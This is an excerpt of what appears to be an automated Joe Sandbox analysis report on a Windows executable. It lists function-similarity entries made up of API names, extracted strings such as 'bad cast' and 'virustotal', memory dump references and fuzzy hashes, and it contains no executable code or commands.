                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70319361A0AA42E1EA10DB15E6400BD6B60FF54BA4F9C02B9DEDD873E5DE3CE847C700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExceptionThrow$std::exception::exception
                                                                                                                                                                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                  • API String ID: 1589471213-1866435925
                                                                                                                                                                                                                                  • Opcode ID: 54f4e4a4734dc6e0b1e3008dbfca8e4a4f274af2efa47cb4c3842ccca1c8752e
                                                                                                                                                                                                                                  • Instruction ID: 06b6b9e78f2d9f7933aecc040db5184ed33169d557478139bd99afd25b3f7690
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54f4e4a4734dc6e0b1e3008dbfca8e4a4f274af2efa47cb4c3842ccca1c8752e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF21A026F1AA46F5EB00DB20E9814EC2B25BF50744F944179DE8D96A69EF3CF599C300
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$Directory$CreateFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                                  • String ID: .exe
                                                                                                                                                                                                                                  • API String ID: 943468954-4119554291
                                                                                                                                                                                                                                  • Opcode ID: ce45eb69d650ccc5491f935c5f71eb0aad31f71449c4adc5bf6abdbe12f3ede6
                                                                                                                                                                                                                                  • Instruction ID: 2785558cee84e71c0a9b445fc18cfd85b1d130a9b45d6ee93bfdddbe17fa430d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce45eb69d650ccc5491f935c5f71eb0aad31f71449c4adc5bf6abdbe12f3ede6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AF11B221A19A57E2EB449B11F85047D7B62FF88B84F846075DC8F82628DE3CE04DC700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockctypestd::bad_exception::bad_exception
                                                                                                                                                                                                                                  • String ID: bad cast
                                                                                                                                                                                                                                  • API String ID: 3320480354-3145022300
                                                                                                                                                                                                                                  • Opcode ID: 77704c3e0316a4ceb633819b756109acd5e019c7a84d8bc16fbfd98e5dbfb666
                                                                                                                                                                                                                                  • Instruction ID: cb4d4afdbc9652f966e8c680c6085e2a1535fab71d7fdcf9cce25e95d0261593
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77704c3e0316a4ceb633819b756109acd5e019c7a84d8bc16fbfd98e5dbfb666
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25319325B0EA42E1EA10DB15E6401B92B61FF50BA4F9C42B9DEED837E5DE3CE442C700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exception_getptd$DestructObject$Raise_getptd_noexit
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 2851507484-1018135373
                                                                                                                                                                                                                                  • Opcode ID: bf4e60e87c46d2a31e1a79f5fbb96882cb91291f71038f4354b5af9e6f1100dd
                                                                                                                                                                                                                                  • Instruction ID: a5fee910339d82880c2f454ce5b1bbe8a4f1c7b29415a54de10a08f10cf7209f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf4e60e87c46d2a31e1a79f5fbb96882cb91291f71038f4354b5af9e6f1100dd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18217A36609646C2D6309B12E2402AEBB60FF85BA5F884179DE9E43795CF3DE486CB00
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$Sleep_malloc_crtmalloc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2523592665-0
                                                                                                                                                                                                                                  • Opcode ID: 481a3ecdffaf1a92365bf5561cbd4cba3cf272347ecd33dfdeae438f1c6dd69c
                                                                                                                                                                                                                                  • Instruction ID: 4c84f5720e421e1ebd484c55760a04939b4e7188c9590fbdf5bb1d47fa8fedba
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 481a3ecdffaf1a92365bf5561cbd4cba3cf272347ecd33dfdeae438f1c6dd69c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67618226B06B01E2EB50DB16EA802697BA4FF84794F484179DECD87B51DF3CE565C300
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1573762532-0
                                                                                                                                                                                                                                  • Opcode ID: b91b70b1a711be88867884abfe0c0040d6edeeba6b26403908f8f87642237241
                                                                                                                                                                                                                                  • Instruction ID: 0b08ff44fb83f90d232640f2e92375ef3bf62d3aceab4e29b4dee8c0cff34bda
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b91b70b1a711be88867884abfe0c0040d6edeeba6b26403908f8f87642237241
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E410662E1A2A2D1EB689B1192411B96AA0FF40B95FCC417DEEDC876C4DF2CE55BC300
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 781512312-0
                                                                                                                                                                                                                                  • Opcode ID: 4c6b3eea06fa5b0576fdbd463b242732bc8057be197bfdb22180e49594bcd200
                                                                                                                                                                                                                                  • Instruction ID: c611ca2d067ab099efc4a6d05e9a0da7bd7d5779e33178bff8ab968f4878887e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c6b3eea06fa5b0576fdbd463b242732bc8057be197bfdb22180e49594bcd200
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61411572E5A3A2D5EB64AB1191501B93BA1FF50BA0F944179EFDC87AC4DE2CE951C300
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$ExceptionLockitLockit::_codecvt$Facet_FileHeaderLocinfoLocinfo::~_RaiseRegisterThrow_lockstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                                                                                  • String ID: bad cast
                                                                                                                                                                                                                                  • API String ID: 2307844773-3145022300
                                                                                                                                                                                                                                  • Opcode ID: 5f85852e3b58f89828f0a6f287818b54055ca26fdad3850610115cc3bd79f0be
                                                                                                                                                                                                                                  • Instruction ID: 170aea132adc55ef9607160901a6c4f244092363b39ad018a60b8d7bfc7c920a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5f85852e3b58f89828f0a6f287818b54055ca26fdad3850610115cc3bd79f0be
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71317322B5EB46E1EA10DB11D4505AC6B65FF58BA0B4502B9DEED877E5DF3CE802C300
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$ExceptionLockitLockit::_ctype$Facet_FileHeaderLocinfoLocinfo::~_RaiseRegisterThrow_lockstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                                                                                  • String ID: bad cast
                                                                                                                                                                                                                                  • API String ID: 2222302978-3145022300
                                                                                                                                                                                                                                  • Opcode ID: d56bbb4b07fd36a7a51dafdb15800d8d917544a03caeee3cb93089a16e5dfef7
                                                                                                                                                                                                                                  • Instruction ID: 3c013df94aa11efa7da10305ee2b51782628be2c4192e0432047c91dbfa9699a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d56bbb4b07fd36a7a51dafdb15800d8d917544a03caeee3cb93089a16e5dfef7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 93317622B5AB52E2EA10DB11D4541786B61FF59BA0B4503B9DEED877D5DF3CD802C300
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd
                                                                                                                                                                                                                                  • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                  • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                                  • Opcode ID: 9ac3fb7d83b05eeba75a9489a1b74f6f4d5fc62a8545616f06d34283c85bf227
                                                                                                                                                                                                                                  • Instruction ID: 48b6a297b0004afddf07bc467e57f63b6f399396bee87831de0c5d1d0e2a4645
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ac3fb7d83b05eeba75a9489a1b74f6f4d5fc62a8545616f06d34283c85bf227
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05F0123590A30AE5E7552B60C3053B829A0FF58B15FCD84BDCA8A8A7C2DF6C6494CA12
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exceptionstd::_$Copy_strFileHeaderLocinfo::_Locinfo_ctorLockitLockit::_RaiseThrow_lockstd::exception::_std::exception::exception
                                                                                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                                                                                  • API String ID: 3392404118-1405518554
                                                                                                                                                                                                                                  • Opcode ID: 614111853f4073aa0dfe77f726be9d54deaf26b0356bd57d534be48d4adb14b6
                                                                                                                                                                                                                                  • Instruction ID: ba92179d0a287115842c0b76f703c0411fe2996031e221bfa294a03d88db356f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 614111853f4073aa0dfe77f726be9d54deaf26b0356bd57d534be48d4adb14b6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7221AE3221AB81DAD750CF24E8801AD7BB4FF58BA4B945279DADC83799EF38D554C340
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: fgetc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2807381905-0
                                                                                                                                                                                                                                  • Opcode ID: 53e39cc6407e9cb1907d60f31e8babac8dd30bbee1de0b2841f7e44098a8426b
                                                                                                                                                                                                                                  • Instruction ID: 6f6f69d3d9e6fea74fd9dd48161ce32983dbb8294630a1ce09c535fa992b1e00
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 53e39cc6407e9cb1907d60f31e8babac8dd30bbee1de0b2841f7e44098a8426b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D714932606A41E9EB10CF75C5903AC37A5FB44B58F98067AEE8D83B99DF38D554C350
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2998201375-0
                                                                                                                                                                                                                                  • Opcode ID: f1762a1455b7082dca170153694eb374a3a880db095f81f52f5ad002d99a4c8c
                                                                                                                                                                                                                                  • Instruction ID: 2b89d832b8fb5389fd9ea9cd288dc6e68f707b960df6a30a9fffd7338dc40125
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f1762a1455b7082dca170153694eb374a3a880db095f81f52f5ad002d99a4c8c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A41AF3260A381D6F7608B15A2402396BA2FF44BA4F985179EFCDA7B96DE3DE445C700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd$_inconsistency$DecodePointer_getptd_noexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3566995948-0
                                                                                                                                                                                                                                  • Opcode ID: fe93ce71788187d4c9f954875e9679249d1b03fcf16c53c5a3782db5a84888f0
                                                                                                                                                                                                                                  • Instruction ID: 9c3559204a9e13a3adf0b81ec51ad3afcf5d2af5fc267429b626a641f50d4d18
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe93ce71788187d4c9f954875e9679249d1b03fcf16c53c5a3782db5a84888f0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5F0FB1191A686E0EA516B55D2411BC5A60BF48F84F8C45BDDECC47387DE18D490C351
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::ios_base::_$Ios_base_dtor$DirectorySystemTidy
                                                                                                                                                                                                                                  • String ID: virustotal
                                                                                                                                                                                                                                  • API String ID: 3076328628-830712347
                                                                                                                                                                                                                                  • Opcode ID: 7c30ee922520a8f81efd21c2b74a54d0bab45ad67358980b01cadac002a257c8
                                                                                                                                                                                                                                  • Instruction ID: be493158aeebe6b68b3af896302902d20f1999b2148ee75d8e30db892c3695a3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c30ee922520a8f81efd21c2b74a54d0bab45ad67358980b01cadac002a257c8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35A1BE22A55B8195EB20CF24D8813ED7B61FF89798F505239EECC87A99DF38D504C340
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _callnewh.LIBCMT ref: 00007FF68A18C52A
                                                                                                                                                                                                                                  • malloc.LIBCMT ref: 00007FF68A18C536
                                                                                                                                                                                                                                    • Part of subcall function 00007FF68A18CA08: _FF_MSGBANNER.LIBCMT ref: 00007FF68A18CA38
                                                                                                                                                                                                                                    • Part of subcall function 00007FF68A18CA08: _NMSG_WRITE.LIBCMT ref: 00007FF68A18CA42
                                                                                                                                                                                                                                    • Part of subcall function 00007FF68A18CA08: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF68A18F770,?,?,?,00007FF68A193E30,?,?,?,00007FF68A193D2F,?,?,00000000,00007FF68A19206E), ref: 00007FF68A18CA5D
                                                                                                                                                                                                                                    • Part of subcall function 00007FF68A18CA08: _callnewh.LIBCMT ref: 00007FF68A18CA76
                                                                                                                                                                                                                                    • Part of subcall function 00007FF68A18CA08: _errno.LIBCMT ref: 00007FF68A18CA81
                                                                                                                                                                                                                                    • Part of subcall function 00007FF68A18CA08: _errno.LIBCMT ref: 00007FF68A18CA8C
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 00007FF68A18C57F
                                                                                                                                                                                                                                    • Part of subcall function 00007FF68A190FE0: RtlPcToFileHeader.NTDLL ref: 00007FF68A19106F
                                                                                                                                                                                                                                    • Part of subcall function 00007FF68A190FE0: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF68A19AE65), ref: 00007FF68A1910AE
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
